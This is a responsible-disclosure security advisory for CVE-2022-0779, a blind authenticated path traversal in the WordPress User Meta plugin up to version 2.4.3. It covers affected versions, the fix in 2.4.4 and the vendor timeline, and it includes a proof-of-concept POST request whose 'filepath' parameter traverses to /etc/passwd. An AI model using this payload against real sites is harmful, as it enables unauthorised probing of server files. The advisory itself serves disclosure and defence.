WordPress User Meta Lite / Pro 2.4.3 Path Traversal

`RCE Security Advisory  
https://www.rcesecurity.com  
  
  
1. ADVISORY INFORMATION  
=======================  
Product: User Meta  
Vendor URL: https://wordpress.org/plugins/user-meta  
Type: Relative Path Traversal [CWE-23]  
Date found: 2022-02-28  
Date published: 2022-05-24  
CVSSv3 Score: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)  
CVE: CVE-2022-0779  
  
  
2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.  
  
  
3. VERSIONS AFFECTED  
====================  
User Meta Lite 2.4.3 and below  
User Meta Pro 2.4.3 and below  
  
  
4. INTRODUCTION  
===============  
An easy-to-use user profile and management plugin for WordPress that allows  
user login, reset-password, profile update and user registration with extra  
fields, all on front-end and many more. User Meta Pro is a versatile user  
profile builder and user management plugin for WordPress that has the most  
features on the market. User Meta aims to be your only go to plugin for  
user management.  
  
(from the vendor's homepage)  
  
  
5. VULNERABILITY DETAILS  
========================  
The WordPress ajax action "um_show_uploaded_file" is vulnerable to an  
authenticated path traversal when user-supplied input to the HTTP POST  
parameter "filepath" is processed by the web application. Since the application  
does not properly validate and sanitize this parameter, it is possible to  
enumerate local server files using a blind approach. This is because the  
application doesn't return the contents of the referenced file but instead  
returns different form elements based on whether a file exists or not.  
  
The following Proof-of-Concept triggers this vulnerability:  
  
POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 147  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Cookie: [your-wordpress-auth-cookies]  
Connection: close  
  
field_name=[your-field-name]&filepath=/../../../../../etc/passwd&field_id=[your-field-id]&form_key=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true  
  
  
6. RISK  
=======  
The vulnerability can be used by an authenticated attacker to enumerate  
local server files based on a blind approach.  
  
  
7. SOLUTION  
===========  
Update to User Meta/User Meta Pro 2.4.4  
  
  
8. REPORT TIMELINE  
==================  
2022-02-28: Discovery of the vulnerability  
2022-02-28: WPScan (CNA) assigns CVE-2022-0779  
2022-03-03: Contacted the vendor via their contact form  
2022-03-06: Vendor response, acknowledgement of the issue  
2022-03-18: Version 2.4.2 is released  
2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. Contacted vendor again.  
2022-04-13: No response, contacted vendor again  
2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest.  
2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor again.  
2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine  
2022-05-16: Fix seems to work  
2022-05-24: Public disclosure  
  
  
9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories  
  
`